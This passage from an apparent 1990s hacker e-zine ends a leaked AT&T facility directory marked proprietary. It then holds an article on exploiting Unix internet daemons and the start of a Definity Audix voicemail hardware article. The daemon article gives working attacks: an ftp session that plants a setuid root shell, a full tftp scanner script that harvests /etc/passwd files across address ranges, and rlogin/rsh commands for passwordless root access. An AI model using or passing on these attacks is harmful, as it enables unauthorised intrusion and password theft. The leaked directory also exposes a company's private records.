  2624. SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E.    ALBUQURQUE NM 87123  505-844-5678
  2625. AT&T 220 EDISON WAY                         RENO       NV 89502  702-239-7015
  2626. AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS     NEW YORK   NY 10013  212-219-6396
  2627. AT&T-NYC 22 CORTLANDT ST.                   NEW YORK   NY 10017  212-393-9800
  2628. 550 MADISON AVE.                            NEW YORK   NY 10022  212-605-5500
  2629. NS ONE PENN PLAZA SUITE 5420                NEW YORK   NY 10119  212-714-5900
  2630. AT&T 2 MANHATTANVILLE RD.                   PURCHASE   NY 10577  914-251-0700
  2631. SUFFERN MMC 22 HEMION RD.                   SUFFERN    NY 10901  914-577-6600
  2632. AT&T 520 BROAD HOLLOW RD.                   MELVILLE   NY 11747  516-420-3000
  2633. ALBANY 11 26 AVIATION RD.                   ALBANY     NY 12205  518-489-4615
  2634. AT&T 16 CORPORATE WOODS BLVD.               ALBANY     NY 12211  518-447-6900
  2635. AT&T 2 JEFFERSON PLAZA, FLR 2               POUGHKEPSE NY 12601  914-485-7744
  2636. AT&T MARKETING 6597 KINNE RD                SYRACUSE   NY 13214  315-445-3800
  2637. AT&T 300 PEARL ST. OLYMPIA TOWERS           BUFFALO    NY 14202  716-849-6000
  2638. BUFFALO INSTALL. 25 JOHN GLENN DR.          AMHERST    NY 14228  716-691-2711
  2639. AT&T 1 MARINE MIDLAND PLZ.                  ROCHESTER  NY 14604  716-777-4400
  2640. CET 5151 BLAZER MEM. PKWY                   DUBLIN     OH 43017  614-764-5454
  2641. COLUMBUS WORKS 6200 E. BROAD ST.            COLUMBUS   OH 43213  614-860-2000
  2642. AT&T ONE SEAGATE, SUITE 750                 TOLEDO     OH 43604  419-245-3700
  2643. AT&T-NS 55 ERIEVIEW PLAZA 4TH FL.           CLEVELAND  OH 44114  216-664-6500
  2644. ADP 7007 E. PLEASANT VALLEY                 INDEPNDNCE OH 44131  216-447-1980
  2645. NAT'L ACCOUNT 1 FIRST NAT'L PLAZA           DAYTON     OH 44502  513-449-7800
  2646. AT&T 7725 W. RENO AVE.                      OK. CITY   OK 73126  405-491-3000
  2647. AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE.   PORTLAND   OR 97201  503-295-5000
  2648. AT&T MICROELECT 1220 SW GREENBURGH RD       PORTLAND   OR 97223  503-244-3883
  2649. AT&T COMMERCE CT. 4 STATION SQ. SUITE 770   PITTSBURGH PA 15219  412-338-4800
  2650. AT&T 4 GATEWAY CTR. SUITE 500               PITTSBURGH PA 15222  412-392-8200
  2651. AT&T 470 STREETS RUN RD.                    PITTSBURGH PA 15236  412-882-1845
  2652. HARRISBURG 2080 LINGLESTOWN RD.             HARRISBURG PA 17110  717-540-7251
  2653. ALLENTOWN-BETHLEHEM 2255 AVE. A             BETHLEHEM  PA 18018  215-861-2700
  2654. AT&T-BL STC RT 222                          BREINIGSVL PA 18103  215-391-2000
  2655. AT&T MICROELECT. 961 MARCON BLVD.           ALLENTOWN  PA 18103  215-266-2900
  2656. ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD.     ALLENTOWN  PA 18103  215-770-2200
  2657. AT&T 1 IMPERIAL WAY 2ND FL.                 ALLENTOWN  PA 18195  215-398-5800
  2658. AT&T 3 BALA PLAZA WEST BLDG.                BALA CYNWD PA 19004  215-581-2400
  2659. AT&T 514 KAISER DR.                         FOLCROFT   PA 19032  215-724-5250
  2660. AT&T 1800 JFK BLVD., SUITE 1300             PHILADELPH PA 19103  215-972-1300
  2661. KING OF PRUSSIA 601 ALLENDALE RD.           KING OF PR PA 19406  215-768-2600
  2662. READING WORKS 2525 N. 12TH ST.              READING    PA 19604  215-939-7011
  2663. AT&T NASSAU RECYCLE 4201 W. COLUMBIA        CASEY      SC 29033  803-796-4720
  2664. AT&T 1201 MAIN ST. 22ND FL.                 COLUMBIA   SC 29201  803-733-3800
  2665. AT&T 111 WESTWOOD PL. 3RD FL.               BRENTWOOD  TN 37027  615-377-4000
  2666. AT&T MICROELECT. 195 POLK AVE.              NASHVILLE  TN 37211  615-749-8222
  2667. AT&T REPAIR CTR 653 MAINSTREAM DR.          NASHVILLE  TN 37228  615-242-1950
  2668. NASHVILLE MSL 566 MAINSTREAM DR.            NASHVILLE  TN 37228  615-256-4111
  2669. AT&T 9041 EXECUTIVE PARK                    KNOXVILLE  TN 37923  615-690-3400
  2670. AT&T-NS SALES 909 E.LAS COLINAS BLVD        IRVING     TX 75039  214-401-4700
  2671. DALLAS WORKS 3000 SKYLINE DRIVE             MESQUITE   TX 75149  214-284-2000
  2672. AT&T-NS 1201 MAIN ST. SUITE 2555            DALLAS     TX 75202  214-745-4790
  2673. AT&T 5525 LBJ FREEWAY                       DALLAS     TX 75240  214-308-2000
  2674. AT&T 2501 PARKVIEW DR., SUITE 200           FT.WORTH   TX 76102  817-870-4400
  2675. AT&T-NS 2900 N. LOOP WEST                   HOUSTON    TX 77092  713-956-4400
  2676. AT&T CITYVIEW 10999 IH 10 W                 SAN ANTON  TX 78230  512-691-5700
  2677. AT&T 5444 S. STAPLES                        CORPUS CHR TX 78411  512-994-4400
  2678. AT&T 8911 CAP. OF TEX HGHWY                 AUSTIN     TX 78759  512-343-3000
  2679. AT&T 415 WEST 8TH ST. SUITE 307             AMARILLO   TX 79101  806-374-9435
  2680. AT&T-BMG 3000 N. GARFIELD SUITE 180         MIDLAND    TX 79705  915-687-8700
  2681. AT&T-NS 10521 ROSEHAVEN ST.                 FAIRFAX    VA 22030  703-352-0900
  2682. AT&T-NS 12450 FAIR LAKES CIRCLE             FAIRFAX    VA 22033  703-631-3288
  2683. AT&T-BELL LABS 1201 S. HAYES ST.            ARLINGTON  VA 22202  703-769-8900
  2684. AT&T 1550 WILSON BLVD.                      ARLINGTON  VA 22209  703-247-4690
  2685. AT&T FED SYS 1201 S. HAYES ST.              ARLINGTON  VA 22209  703-685-8678
  2686. AT&T MAJOR MKT & SALES 600 EAST BROAD ST.   RICHMOND   VA 23219  804-775-3300
  2687. AT&T OSO 1530 E. RUN RD.                    RICHMOND   VA 23228  804-262-4062
  2688. RICHMOND WORKS 4500 S. LABURNUM AVE.        RICHMOND   VA 23231  804-226-5000
  2689. AT&T 1338 PLANTATION RD NE                  ROANOKE    VA 24012  703-344-1160
  2690. NEW RIVER VALLEY CALLER 21                  RADFORD    VA 24143  703-731-8000
  2691. AT&T 2901 THIRD AVE.                        SEATTLE    WA 98121  206-443-7000
  2692. AT&T ACCT MGMT 2121 4TH AVE.                SEATTLE    WA 98121  206-728-4749
  2693. AT&T N. 9 POST SUITE 330                    SPOKANE    WA 99201  509-747-6110
  2694. AT&T 400 S. EXECUTIVE DR.                   BROOMFIELD WI 53005  414-785-9110
  2695. MILWAUKEE CP/ASSEM.CTR                      MILWAUKEE  WI 53212  414-963-8200
  2696. AT&T 2802 INTERNAT'L LN, 2ND FLR            MADISON    WI 53704  608-241-8900
  2697. AT&T 900 PENNSYLVANIA AVE.                  CHARLESTON WV 25302  304-347-2000
  2698. MARTINSBURG MMC TABLER STA.RD.              MARTINSBRG WV 25401  304-263-6931
  2699. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2700.  
  2701. And remember...
  2702.  
  2703. All directory information is classified AT&T Proprietary and, as such, should
  2704. be safeguarded as outlined in GEI 2.2.  Responsibility for security is passed
  2705. on to each employee receiving the directory.
  2706.  
  2707.  
  2708. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                                 
  2709.  
  2710.                   
  2711.  
  2712.                   Playing with the Internet Daemons
  2713.  
  2714.                                 by
  2715.  
  2716.                            Voyager [TNO]
  2717.  
  2718.  
  2719. Internet hosts communicate with each other using either TCP
  2720. (Transmission Control Protocol) or UDP (User Datagram Protocol) on top
  2721. of IP (Internet Protocol).  Other protocols are used on top of IP, but
  2722. TCP and UDP are the ones that are of interest to us.  On a Unix system,
  2723. the file /etc/protocols will list the available protocols on your
  2724. machine
  2725.  
  2726. On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
  2727. Model) data is moved between hosts by using ports.  Each data
  2728. communication will have a source port number and a destination port
  2729. number.  Port numbers can be divided into two types, well-known ports
  2730. and dynamically allocated ports.  Under Unix, well-known ports are
  2731. defined in the file /etc/services.  In addition, RFC (Request For
  2732. Comments) 1700 "Assigned Numbers" provides a complete listing of all
  2733. well-known ports.  Dynamically allocated port numbers are assigned as
  2734. needed by the system.
  2735.  
  2736. Unix provides the ability to connect programs called daemons to
  2737. well-known ports.  The remote computer will connect to the well-known
  2738. port on the host computer, and be connected to the daemon program.
  2739.  
  2740. Daemon programs are traditionally started by inetd (The Internet
  2741. Daemon).  Daemon programs to be executed are defined in the inetd
  2742. configuration file, /etc/inetd.conf.
  2743.  
  2744. Most of these daemons run as a priveledged user, often as root.  Many of
  2745. these programs have vulnerabilities which can be exploited to gain access
  2746. to remote systems.
  2747.  
  2748. The daemons we are interested in are:
  2749.  
  2750.         Service          Port Number    Description
  2751.         ~~~~~~~~~~~~~    ~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2752.         ftp              21             File Transfer [Control]
  2753.         smtp             25             Simple Mail Transfer Protocol
  2754.         tftp             69             Trivial File Transfer Protocol
  2755.         finger           79             Finger
  2756.         www-http         80             World Wide Web HTTP
  2757.         sunrpc          111             SUN Remote Procedure Call
  2758.         fln-spx         221             Berkeley rlogind with SPX auth
  2759.         rsh-spx         222             Berkeley rshd with SPX auth
  2760.         netinfo         716-719         NetInfo
  2761.         ibm-res         1405            IBM Remote Execution Starter
  2762.         nfs             2049            Network File System
  2763.         x11             6000-6063       X Window System
  2764.  
  2765.         rcp/rshd                        Remote Copy/Remote Shell Daemon
  2766.         nis                             Network Information Services
  2767.  
  2768.  
  2769.  
  2770.  
  2771.  
  2772. The next part of this article will focus on specific daemons and their
  2773. known vulnerabilities.  The vulnerabilities with brief explanations will be
  2774. explained here.  For the more complicated exploits, which are beyond the
  2775. scope of a concise article, more research will be required on the part of
  2776. the reader.
  2777.  
  2778.  
  2779.  
  2780.  --> ftp              21    File Transfer [Control]
  2781.  
  2782. FTP is the File Transfer Protocol.  FTP requests are answered by the FTP
  2783. daemon, ftpd.  wuarchive's ftpd versions below 2.2 have a vulnerability
  2784. where you can execute any binary you can see with the 'site exec'
  2785. command by calling it with a relative pathname with "../" at the
  2786. beginning.  Here is a sample exploit:
  2787.  
  2788. Login to the system via ftp:
  2789.  
  2790.         220 uswest.com FTP server (Version wu-2.1(1) ready.
  2791.         Name (uswest.com:waltman): waltman
  2792.         331 Password required for waltman.
  2793.         Password: jim
  2794.         230 User waltman logged in.
  2795.         Remote system type is UNIX.
  2796.         Using binary mode to transfer files.
  2797.         ftp> quote "site exec cp /bin/sh /tmp/.tno"
  2798.         200-cp /bin/sh /tmp/tno
  2799.         ftp> quote "site exec chmod 6755 /tmp/.tno"
  2800.         200-chmod 6755 /tmp/tno
  2801.         ftp> quit
  2802.         221 Goodbye.
  2803.  
  2804.  
  2805.  
  2806. --> smtp             25    Simple Mail Transfer Protocol
  2807.  
  2808. Mail attacks are one of the oldest known methods of attacking Internet
  2809. hosts.  The most common mail daemon, and least secure, is sendmail. Other
  2810. mail daemons include smail, MMDF,and IDA sendmail.  Sendmail has had too
  2811. many vulnerabilities to list them all.  There is an entire FAQ written
  2812. specifically on sendmail vulnerabilities, therefore we will not cover them
  2813. heavily here.
  2814.  
  2815. One well known vulnerability, useful only for historical purposes, is
  2816. "Wizard Mode."  In Wizard mode you could request a shell via Port 25
  2817. (The SMTP port).  No modern system will be vulnerable to this attack.  To
  2818. exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
  2819. Wizard mode, and entered the password.  The problem related to the way
  2820. the encrypted password was stored.  There was a bug that caused the
  2821. system to believe that no password was as good as the real password.
  2822.  
  2823. To quote Steven Bellovin:
  2824.  
  2825.         The intended behavior of wizard mode was that if you supplied
  2826.         the right password, some other non-standard SMTP commands were
  2827.         enabled, notably one to give you a shell.  The hashed password
  2828.         -- one-way encrypted exactly as per /etc/passwd -- was stored in
  2829.         the sendmail configuration file.  But there was this bug; to
  2830.         explain it, I need to discuss some arcana relating to sendmail
  2831.         and the C compiler.
  2832.  
  2833.         In order to save the expense of reading and parsing the
  2834.         configuration file each time, sendmail has what's known as a
  2835.         ``frozen configuration file''.  The concept is fine; the
  2836.         implementation isn't.  To freeze the configuration file,
  2837.         sendmail just wrote out to disk the entire dynamic memory area
  2838.         (used by malloc) and the `bss' area -- the area that took up no
  2839.         space in the executable file, but was initialized to all zeros
  2840.         by the UNIX kernel when the program was executed.  The bss area
  2841.         held all variables that were not given explicit initial values
  2842.         by the C source. Naturally, when delivering mail, sendmail just
  2843.         read these whole chunks back in, in two giant reads.  It was
  2844.         therefore necessary to store all configuration file information
  2845.         in the bss or malloc areas, which demanded a fair amount of care
  2846.         in coding.
  2847.  
  2848.         The wizard mode password was stored in malloc'ed memory, so it
  2849.         was frozen properly.  But the pointer to it was explicitly set
  2850.         to NULL in the source:
  2851.  
  2852.         char    *wiz = NULL;
  2853.  
  2854.         That meant that it was in the initialized data area, *not* the
  2855.         bss. And it was therefore *not* saved with the frozen
  2856.         configuration.  So -- when the configuration file is parsed and
  2857.         frozen, the password is read, and written out.  The next time
  2858.         sendmail is run, though, the pointer will be reset to NULL.
  2859.         (The password is present, of course, but there's no way to find
  2860.         it.)  And the code stupidly believed in the concept of no
  2861.         password for the back door.
  2862.  
  2863.         One more point is worth noting -- during testing, sendmail did
  2864.         the right thing with wizard mode.  That is, it did check the
  2865.         password -- because if you didn't happen to do the wizard mode
  2866.         test with a frozen configuration file -- and most testing would
  2867.         not be done that way, since you have to refreeze after each
  2868.         compilation -- the pointer would be correct.
  2869.  
  2870.  
  2871.  
  2872.  --> tftp             69    Trivial File Transfer Protocol
  2873.  
  2874. tftp is the Trivial File Transfer Protocol.  tftp is most often used to
  2875. attempt to grab password files from remote systems.  tftp attacks are so
  2876. simple and repetitive that scripts are written to automate the process
  2877. of attacking entire domains.  Here is one such script:
  2878.  
  2879.    #!/bin/sh
  2880.    ########################################################################
  2881.    #                     TFTP snagger by Yo
  2882.    # It snags /etc/passwd files from all hosts with open 69 (tftp) port.
  2883.    # scans all hosts from XX.XX.0.0 - XX.XX.255.255
  2884.    # you can run it in the background in following way:
  2885.    #                snag [hostname] > /dev/null &
  2886.    #     [hostname] might be used IP # (with -ip option) as well as FQDN
  2887.    #                   Last Updated 10/20/92
  2888.    #
  2889.    #            Highly modified by ThePublic on 10/21/92
  2890.    ########################################################################
  2891.    case $1 in
  2892.     '')
  2893.      echo " Usage: $0 [hostname]  to run in the foreground                    "
  2894.      echo "        $0 [hostname] > /dev/null & to run in the background       "
  2895.      echo " The [hostname] can be specialized in fully qualified domain name  "
  2896.      echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain.        "
  2897.      echo " as well as IP with -ip option.                                    "
  2898.       exit 1
  2899.       ;;
  2900.     -ip)
  2901.     if [ $2x = x ]; then
  2902.      echo " Usage: $0 $1 the IP "
  2903.      exit 1
  2904.       else
  2905.           x=`echo $2 | cut -d. -f1`
  2906.          xx=`echo $2 | cut -d. -f2`
  2907.         xxx=`echo $2 | cut -d. -f3`
  2908.        xxxx=`echo $2 | cut -d. -f4`
  2909.    #                        ^ field delimiter is '.' -- get field 1/2/3/4
  2910.     fi;;
  2911.      *)
  2912.    if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
  2913.                                   # -x is for SunOs
  2914.     echo sorry dude, no nslookup server .. try it with -ip option.
  2915.    exit 1
  2916.    fi
  2917.    x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
  2918.    #                                          ^ 7 chars   ^ last line
  2919.    if [ "$x1" = '' ]; then
  2920.    echo " There is no such domain. Nothing to scan. Exit. "
  2921.    exit 1
  2922.    fi
  2923.       x=`echo $x1 | cut -d. -f1`  # get the first set of #, ##, or ###
  2924.      xx=`echo $x1 | cut -d. -f2`  # get the second set
  2925.     xxx=0                         # ignore the rest, if any
  2926.    xxxx=0
  2927.       ;;
  2928.     esac
  2929.    if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
  2930.     echo There is no such domain. Nothing to scan.
  2931.    exit 1
  2932.    fi
  2933.    while [ $x -ne 255 ]; do
  2934.  
  2935.    while [ $xx -ne 255 ]; do
  2936.    while [ $xxx -ne 255 ]; do
  2937.    while [ $xxxx -ne 255 ]; do
  2938.    target=$x.$xx.$xxx.$xxxx
  2939.    trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
  2940.    tftp << EOF
  2941.    c $target
  2942.    mode ascii
  2943.    trace
  2944.    get /etc/passwd passwd.$target
  2945.    quit
  2946.    EOF
  2947.    if [ ! -s passwd.$target ]  ; then
  2948.     rm -rf passwd.$target
  2949.    echo `date`  $target has rejected an attempt >> .info
  2950.      else
  2951.      mv passwd.$target  .good.$target
  2952.        echo `date` $target is taken, all data is stored in .good.$target file >> .info
  2953.     fi
  2954.     xxxx=`expr $xxxx + 1 `
  2955.    done
  2956.    xxxx=0
  2957.    xxx=`expr $xxx + 1 `
  2958.    done
  2959.    xxx=0
  2960.    xx=`expr $xx + 1 `
  2961.    done
  2962.    xx=0
  2963.    x=`expr $x + 1 `
  2964.    done
  2965.  
  2966.  
  2967.  
  2968.  --> finger           79    Finger
  2969.  
  2970. The finger command displays information about another user, such as login
  2971. name, full name, terminal name, idle time, login time, and location if
  2972. known.  finger requests are answered by the fingerd daemon.
  2973.  
  2974. Robert Tappan Morris's Internet Worm used the finger daemon.  The finger
  2975. daemon allowed up to 512 bytes from the remote machine as part of the
  2976. finger request.  fingerd, however, suffered from a buffer overflow bug
  2977. caused by a lack proper bounds checking.  Anything over 512 got
  2978. interpreted by the machine being fingered as an instruction to be
  2979. executed locally, with whatever privileges the finger daemon had.
  2980.  
  2981.  
  2982.  
  2983.  --> www-http         80    World Wide Web HTTP
  2984.  
  2985. HTML (HyperText Markup Language) allows web page user to execute
  2986. programs on the host system.  If the web page designer allows the web
  2987. page user to enter arguments to the commands, the system is vulnerable
  2988. to the usual problems associated with system() type calls.  In addition,
  2989. there is a vulnerability that under some circumstances will give you an
  2990. X-Term using the UID that the WWW server is running under.
  2991.  
  2992.  
  2993.  
  2994.  --> sunrpc          111    SUN Remote Procedure Call
  2995.  
  2996. Sun RPC (Remote Procedure Call) allows users to execute procedures on
  2997. remote hosts.  RPC has suffered from a lack of secure authentification.
  2998. To exploit RPC vulnerabilities, you should have a program called "ont"
  2999. which is not terribly difficult to find.
  3000.  
  3001.  
  3002.  
  3003.  --> login           513   Remote login
  3004.  
  3005. Some versions of AIX and Linux suffer from a bug in the way that
  3006. rlogind reads arguments.  To exploit this vulnerability, issue this
  3007. command from a remote system:
  3008.  
  3009. rlogin host -l -froot
  3010.  
  3011. Where host is the name of the target machine and username is the username
  3012. you would like to rlogin as (usully root).  If this bug exists on the
  3013. hosts system, you will be logged in, without being asked for a password.
  3014.  
  3015.  
  3016.  
  3017.  --> rsh-spx         222    Berkeley rshd with SPX auth
  3018.  
  3019. Some versions of Dynix and Irix have a bug in rshd that allows you to
  3020. run commands as root.  To exploit this vulnerability, issue this command
  3021. from the remote system:
  3022.  
  3023. rsh host -l "" /bin/sh
  3024.  
  3025.  
  3026.  
  3027.  --> netinfo         716-719    NetInfo
  3028.  
  3029. NeXT has implemented a protocol known as NetInfo so that one NeXT
  3030. machine can query another NeXT machine for information.  A NetInfo
  3031. server will by default allow unrestricted access to system databases.
  3032. This can be fixed by the System Administrator.  One of the pieces of
  3033. information netinfo will give up is the password file.
  3034.  
  3035.  
  3036.  
  3037.  --> ibm-res         1405   IBM Remote Execution Starter
  3038.  
  3039. rexd (the remote execution daemon) allows you to execute a program on
  3040. another Unix machine.  AIX, NeXT and HPUX versions of rexd have suffered
  3041. from a vulnerability allowing unintended remote execution. The rexd
  3042. daemon checks your uid on the machine you are coming from, therefore you
  3043. must be root on the machine you are mounting the rexd attack from.  To
  3044. determine if your target machine is running rexd, use the 'rcp -p
  3045. <target>' command.  You will also need the exploit program known as 'on'
  3046. which is available on fine H/P boards everywhere.
  3047.  
  3048.  
  3049.  
  3050.  --> nfs             2049            Network File System
  3051.  
  3052. NFS, the Network File System, from Sun Microsystems has suffered from
  3053. multiple security vulnerabilities.  In addition, many system
  3054. administrators configure NFS incorrectly, allowing unintended remote
  3055. access.
  3056.  
  3057. Using the command 'showmount -e <target>' you can view what file systems
  3058. are exported from a machine.  Many administrators allow read access to
  3059. the /etc directory, allowing you to copy the password file. Other
  3060. administrators allow write access to user directories, allowing you to
  3061. create .rhosts files and gain access to the machine via rlogin or rsh.
  3062.  
  3063. In addition to configuration issues, NFS is vulnerable to attacks using
  3064. a uid masking bug, a mknod bug, and a general file handle guessing
  3065. attack.  Several hacked versions of the mount command have been written
  3066. to exploit known vulnerabilities.
  3067.  
  3068.  
  3069.  
  3070.  --> x11             6000-6063       X Window System
  3071.  
  3072. X-Windows has suffered and currently suffers from numerous
  3073. vulnerabilities. One vulnerability allows you to access another users
  3074. display, another allows you to view another users keystrokes.  Another
  3075. vulnerability allows a remote attacker to run every program that the
  3076. root user starts in his or her .xsession file.  Yet another X-Windows
  3077. vulnerability allows a local user to create a root entry in the
  3078. /etc/passwd file.
  3079.  
  3080.  
  3081.  
  3082.  --> rcp
  3083.  
  3084. The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
  3085. in /etc/hosts.equiv or /.rhosts.  To exploit this hole you must be
  3086. running NFS (Network File System) on a Unix system or PC/NFS on a DOS
  3087. system.
  3088.  
  3089.  
  3090.  
  3091.  --> NIS
  3092.  
  3093. Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
  3094. has a vulnerability where you can request an NIS map from another NIS
  3095. domain if you know the NIS domain name of the target system.  There is
  3096. no way to query a remote system for it's NIS domainname, but many NIS
  3097. domain names are easily guessable.  The most popular NIS map to request
  3098. is passwd.byname, the NIS implementation of /etc/passwd.  In addition,
  3099. if you have access to a diskless Unix workstation, you can determine the
  3100. NIS domain name of the server it boots from.
  3101.  
  3102.         +--------------------------------------------------------+
  3103.         + Do not confuse NIS domain names with DNS domain names! |
  3104.         +--------------------------------------------------------+
  3105.  
  3106.  
  3107.  
  3108.  --> Other attacks
  3109.  
  3110. In addition to these daemon based attacks, many other methods can be
  3111. used to gain access to a remote computer.  These include, but are not
  3112. limited to: default accounts, password guessing, sniffing, source
  3113. routing, DNS routing attacks, tcp sequence prediction and uucp
  3114. configuration exploits.
  3115.  
  3116. This should give you an idea on how daemon based attacks function.  By
  3117. no means is this a complete list of security vulnerabilities in
  3118. privileged internet daemons.  To discover more information about how
  3119. these daemons operate, and how to exploit their vulnerabilities, I
  3120. highly recommend reading source code, man pages and RFC's.
  3121.  
  3122.  
  3123.                                                         Voyager[TNO]
  3124.  
  3125.  
  3126. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                                 
  3127.  
  3128.                 
  3129.                 
  3130.                 [][][][][][][][][][][][][][][][][][][][][][]
  3131.                 [[[                                      ]]]
  3132.                 [[[[  THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
  3133.                 [[[[[                                  ]]]]]
  3134.                 [[[[[[[        by: Boba Fett         ]]]]]]]
  3135.                 [[[[[[[[[[[                      ]]]]]]]]]]]
  3136.                 [][][][][][][][][][][][][][][][][][][][][][]
  3137.  
  3138.  
  3139. - " What?! Another crummy file on the Audix voice mail? "
  3140.  
  3141. Not exactly. In COTNO #1, you will find a good article on identifying and
  3142. obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
  3143. discuss the physical/electrical design of the Audix System and how it's
  3144. integrated with the Definity switch. I will not discuss how to obtain
  3145. dialups to the audix or hacking it, that's another file :). Most of the
  3146. information and diagrams in this paper where gathered from various sources.
  3147. Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
  3148. representatives. ;)
  3149.  
  3150.  
  3151. 1) Hardware
  3152. -----------
  3153.  
  3154. All right, what does this baby look like? Well, all in all, it's quite simple.
  3155. There are 4 major components, all of which can be easily replaced or removed.
  3156. A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
  3157. front panel looks like.
  3158.  
  3159.  
  3160.                Disk/Alarm board      MFB panel
  3161.  
  3162.             .---------------------.__.-----.
  3163.             |  _______________    |  |     |
  3164.             | |               |   |  |  o  <----- Red LED
  3165.             | |               |   |  |     |
  3166.             | |          |||  |   |  |  O  <---------- "Enter/yes" Button
  3167.             | |          |||  |   |  | __  |
  3168.  Tape   ----->|         ||||  |   |  | ||  |
  3169.  Unit       | |         ||||  |   |  | ||  |
  3170.             | |          |||  |   |  | ||  <----- Alphanumeric liquid
  3171.             | |          |||  |   |  | ||  |      crystal display(10 character)
  3172.             | |          |||  |   |  | --  |
  3173.             |  ---------------    |  |  O  <---- "Next/no" button
  3174.             |                     |  |     |
  3175.             |                     |  |     |
  3176. Boot/    ----------------->  O    |  |  O  <---- "Back" button
  3177. shutdown    |                     |  |Back |
  3178. button      | .--------.          |  |     |
  3179.             | | Some   |          |  |     |
  3180.             | | stupid |      _   |  |  _  |
  3181.             | | warning|     | |  |  | | <-------------- Handles/
  3182.             | | label. |     | |  |  | | | |    /        latch
  3183.             | |________|     | <----------------
  3184.             .________________|_|__|--|_|_|_|
  3185.  
  3186.  
  3187. As you can see, it consists of two boards: The multifunction board (right), and
  3188. the disk/alarm board (left).
  3189.  
  3190. o MFB major components:
  3191.  
  3192.         - A 386 processor  (supports Unix System V) with 16 megs of dynamic 
  3193.           RAM (DRAM).
  3194.         - An array of six 50 mhz digital signal processors (DSPs).
  3195.         - The Definity switch time-division multiplexed (TDM) bus interface.
  3196.         - An alarm monitoring processor. :(
  3197.  
  3198. o D/ALB major components:
  3199.  
  3200.         - A tape drive
  3201.         - A Hard Drive
  3202.         - An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
  3203.  
  3204.  
  3205. The modem is included with the package. If the on-board modem does not
  3206. comply with the local telco rules (for example foreign countries) , than
  3207. through the RS-232 port an external one can be attached. Let's take a deeper
  3208. look inside and see where the components go.
  3209.  
  3210.                           .--------------------------------------.
  3211.                          /|          + Disk/Alarm Board +        |__Tip/Ring
  3212.    .--------.          /  | .------------------remote acs ports--|___RS-232
  3213.    |        |        /    | |                                    |
  3214.    |        |      /      | |  .------|--------|--------Ethernet----- LAN
  3215.    |S       |    /        | |  |    Tape  System Disk  controller|
  3216.    |W       |  /          |_|__|_________________________________|
  3217.    |I       |/            |-|--|---------------------------------|
  3218.    |T|======|             | |  |    + Multifunction Board +      |
  3219.    |C| Audix|             | |  |                                 |
  3220.    |H|======|             | |  |                      /============== RS-232
  3221.    |        |\            | |  SCSI      386 Serial Data  Packet |
  3222.    |________| \           | | Interface  CPU async/sync.  bus    |--- Packet
  3223.                 \         | | -|-----------|-------|------inter- |     Bus
  3224.                   \       | |  |         16 Meg    DMA     face  |
  3225.                     \     |  Faceplate    RAM       | \    |     |
  3226.                       \   |   & Control             |   \ TDM    |
  3227.                         \ |                3 DSP 32Cs---Interface|--- TD bus
  3228.                           \______________________________________|
  3229.  
  3230.  
  3231. o Explanation of some terms:
  3232.  
  3233.         CPU: Central Processing Unit
  3234.         DSP: Digital Signal Processor
  3235.         TDM: Time-Division Multiplexed
  3236.         DMA: Direct Memory Access
  3237.         SCSI: Small Computer System Interface
  3238.  
  3239. The Definity Audix VMS is so compact because it has to fit in the Definity
  3240. PBX's port slot. It can: detect a incoming call, detect when the caller has
  3241. disconnected, disconnect a call on ANY port. It can also, disable any port to
  3242. prevent it from receiving incoming calls, and most important of all, it can
  3243. originate outgoing calls. It is also good to know that it has CLID.
  3244. Here's a list of it's functions:
  3245.  
  3246.         - Call History Information (Called Party ID,Calling party ID and
  3247.                              reason for call).
  3248.         - Integrated message waiting notification (LED).
  3249.         - Disconnect message (Contact Administrator for help, please disconnect
  3250.                              goodbye).
  3251.         - Message waiting status information (Updated on activity, Audit of
  3252.                              each vmb and refresh of all vmbs).
  3253.         - Maintenance info. for link.
  3254.         - Audix control of port. (disconnect call, detect caller, etc..)
  3255.  
  3256. I've been referring to it as the Definity Audix, and not just Audix. Audix,
  3257. (aka Audix release 1), was first introduced in 1984. The Definity Audix,
  3258. however, was introduced in 1992, and came with a series of more advanced
  3259. features. For example, the time scale modification option was improved, allowing
  3260. the playback of messages at slower or faster speeds. Or the speech
  3261. encoder/decoder algorithm which was changed resulting in better sound quality
  3262. (so they say). How can you tell if it's a Definity when calling it remotely?
  3263. Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
  3264. apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
  3265. tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
  3266. less than half the time. You can time the reaction, and figure out what your
  3267. dealing with, but there are many things that can affect the response time also
  3268. (for example, the amount of people using the voice mail). As you can see 
  3269. this method isn't very reliable.
  3270.  
  3271. 2) Software
  3272. -----------
  3273.  
  3274. The system software resides on a single 160 meg casettee tape. It is loaded
  3275. on the hard disk whenever an installation or upgrade is being performed. 
  3276. There is also a big part of the code, which constantly monitors multiple 
  3277. thermal sensors on the two circuit packs, making sure that they don't over 
  3278. heat.
  3279.  
  3280. The chick's sweet voice you hear when interacting with the VMS, is composed
